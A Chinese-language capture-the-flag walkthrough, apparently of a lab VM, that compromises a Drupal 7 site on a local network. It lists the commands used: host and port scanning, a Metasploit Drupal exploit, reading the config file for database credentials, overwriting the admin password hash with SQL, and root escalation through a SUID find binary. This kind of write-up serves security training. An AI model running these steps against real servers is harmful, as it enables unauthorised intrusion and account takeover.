使用 arp-scan -l 看一下局域网中存活的主机
192.168.149.150,用 nmap 扫一下:nmap -A 192.168.149.150
可以看到有个 80 口开着,可以先去看一下是干啥的
一个用 drupal cms 搭建起来的网站,扫一波目录
访问一下 robots.txt,里面有个 UPGRANDE.txt
也就是说他现在版本是 7.x 的
用 msf 搜一下看看有没有现成的:
经过测试,使用 2018 年的那个可以
设置一下攻击目标:set RHOSTS 192.168.149.150
然后执行 exploit 开始攻击,成功之后直接 ls 就发现了 flag1.txt
cat 一下看看内容,告诉我们一个好的 cms 需要 config 文件,
去找一下这个 config 文件,Drupal 的默认配置文件为 /var/www/sites/default/settings.php
同时找到了 flag2 和 数据库的用户名与密码
连接不上,自闭? python -c “import pty;pty.spawn(‘/bin/bash’)” 这样开一个交互试试,nice
select * from users;,发现了 admin ,以及他密码的 hash 值
http://drupalchina.cn/node/2128
参考这个方法,把密码给改成 yichen,拿到 hash 后去 mysql 里面替换就可以了
$S$DAowqHa2RDeEsjEuWpJWUE28BF0Hs4QjzoFsMRb8Qvz9Hl87oJKj
update users set pass=’$S$DAowqHa2RDeEsjEuWpJWUE28BF0Hs4QjzoFsMRb8Qvz9Hl87oJKj’ where name=’admin’;
这时候再用 用户名: admin 密码:yichen 去登录网站就登陆成功了
在这个地方,发现 flag3,看一下内容
emmm,在 etc/passwd 看到 flag4 这个用户
在 home/flag4 下面放着 flag4.txt
提权:find / -user root -perm -4000 -print 2>/dev/null 可以发现 find
然后:find ./ -exec “/bin/sh” ;
最终,在 root 目录下发现 thefinalflag.txt
